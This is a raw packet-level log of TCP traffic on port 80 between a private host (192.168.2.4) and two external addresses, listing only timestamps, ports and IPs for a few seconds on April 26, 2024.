Apr 26, 2024 10:27:04.930927992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931052923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931071043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931087971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931103945 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931106091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931116104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931124926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931138992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931143999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931149960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931160927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931173086 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931183100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931205034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931224108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931241035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931257010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931267977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931273937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931286097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931291103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931310892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931310892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931319952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931328058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931333065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931344986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931355953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931361914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931365967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931379080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931387901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931397915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931406975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931416988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931425095 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931435108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931442976 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931452990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931463957 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931469917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931478977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931488037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931499004 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931504965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931507111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931523085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931531906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931540012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931550026 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931556940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931566000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931575060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931583881 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931592941 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931601048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931612015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931617975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931631088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931637049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931653976 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931677103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931700945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931776047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931807995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931822062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931850910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.931874990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.931921959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.933172941 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.933207035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.933244944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.933244944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.933343887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.933415890 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.933433056 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.933470964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.933515072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.933556080 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.933763027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.933810949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.934439898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.934489012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.934531927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.934581041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.934608936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.934653044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.934670925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.934711933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.934755087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.934799910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.934886932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.934932947 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.934998035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.935044050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.935179949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.935228109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.935343981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.935386896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.935589075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.935635090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.935712099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.935760975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.935908079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.935955048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.935997963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.936047077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.936141968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.936188936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.936780930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.936830044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.936945915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.936966896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.936992884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.937011957 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.937015057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.937078953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.937124968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.937561035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.937609911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.937908888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.937957048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.938385010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.938433886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.938436031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.938456059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.938477993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.938493013 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.938874006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.938921928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.938992023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.939035892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.939152956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.939196110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.939208031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.939248085 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.939258099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.939280033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.939302921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.939318895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.939404964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.939434052 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.939449072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.939475060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.939954042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.940002918 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.940046072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.940083981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.940182924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.940227032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.940347910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.940393925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.940912962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.940958977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.940968037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.941006899 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.941014051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.941054106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.941104889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.941148043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.941371918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.941417933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.941838980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.941885948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.942250967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.942296028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945456982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945482016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945506096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945511103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945525885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945530891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945543051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945558071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945574045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945580959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945590019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945607901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945631981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945650101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945657015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945676088 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945683002 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945699930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945708036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945725918 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945732117 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945749998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945758104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945774078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945784092 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945800066 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945808887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945825100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945835114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945848942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945859909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945885897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945887089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945897102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945910931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945926905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945936918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945954084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945964098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.945980072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.945988894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.946008921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.946013927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.946022034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.946039915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.946055889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.946064949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.946079969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.946105003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.946319103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.946342945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.946363926 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.946368933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.946382999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.946393967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.946408033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.946434021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.082748890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.082777023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.082830906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.082916021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.082926035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.082971096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.083425999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.083446026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.083498001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.083534956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.083547115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.083551884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.083584070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.083587885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.083607912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.083625078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.083637953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.083662987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.083837986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084141016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084186077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084204912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084222078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084227085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.084239960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084250927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.084256887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084276915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.084310055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084366083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.084870100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084887981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084914923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084924936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.084933996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084952116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.084989071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.085000992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085040092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.085052013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085069895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085556030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085572958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085594893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.085619926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.085644007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085661888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085678101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085695028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085701942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.085727930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085745096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.085760117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.085797071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.086139917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086163998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086216927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086234093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086251020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086257935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.086268902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086280107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.086286068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086304903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.086343050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086374044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086390018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086412907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.086436033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.086460114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086477041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086493969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086510897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086515903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.086530924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086541891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.086546898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.086641073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.087193966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087245941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087261915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087280035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087304115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.087320089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087330103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.087353945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087394953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.087826014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087865114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087882042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087920904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.087922096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087940931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087958097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087960005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.087975025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.087994099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.088038921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088057041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088073969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088094950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.088118076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.088392019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088440895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088459015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088475943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088483095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.088517904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088524103 CEST	49734	80	192.168.2.4	176.97.76.106
